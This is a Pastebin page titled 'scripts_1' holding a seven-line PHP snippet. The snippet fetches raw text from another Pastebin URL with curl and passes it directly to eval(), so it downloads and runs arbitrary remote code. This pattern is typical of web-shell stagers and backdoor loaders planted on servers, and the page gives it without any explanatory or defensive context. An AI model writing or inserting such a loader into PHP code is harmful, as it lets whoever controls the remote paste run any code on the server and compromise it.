dragondevile

scripts_1

Apr 4th, 2019
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. <?php
  2. $st = curl_init();
  3. curl_setopt($st,CURLOPT_URL,"http://pastebin.com/raw/8XyPUNrh");
  4. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  5. $ex = curl_exec($st);
  6. eval($ex);
  7. ?>
Add Comment
Please, Sign In to add comment